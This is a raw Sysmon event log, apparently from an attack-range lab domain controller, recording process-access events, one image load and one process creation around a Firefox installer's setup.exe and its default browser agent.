13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program 
Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.442{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.443{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe84.0.2Firefox Default Browser AgentFirefoxMozilla Foundationdefault-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" register-task 308046B0AF4A39CBC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=3A94D83189F8B95314F1B2847191CBCE,SHA256=6A68002A96543E07D6EAAE513B02231DDDD71A455623F0E1CDD7C6B93C939645,IMPHASH=C63658719CB70747321FBCA4EAE93153{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.442{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.411{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.411{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x800000000000000016384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.411{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ServicesHelper.dll2021-01-18 13:59:53.411 10341000x800000000000000016383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
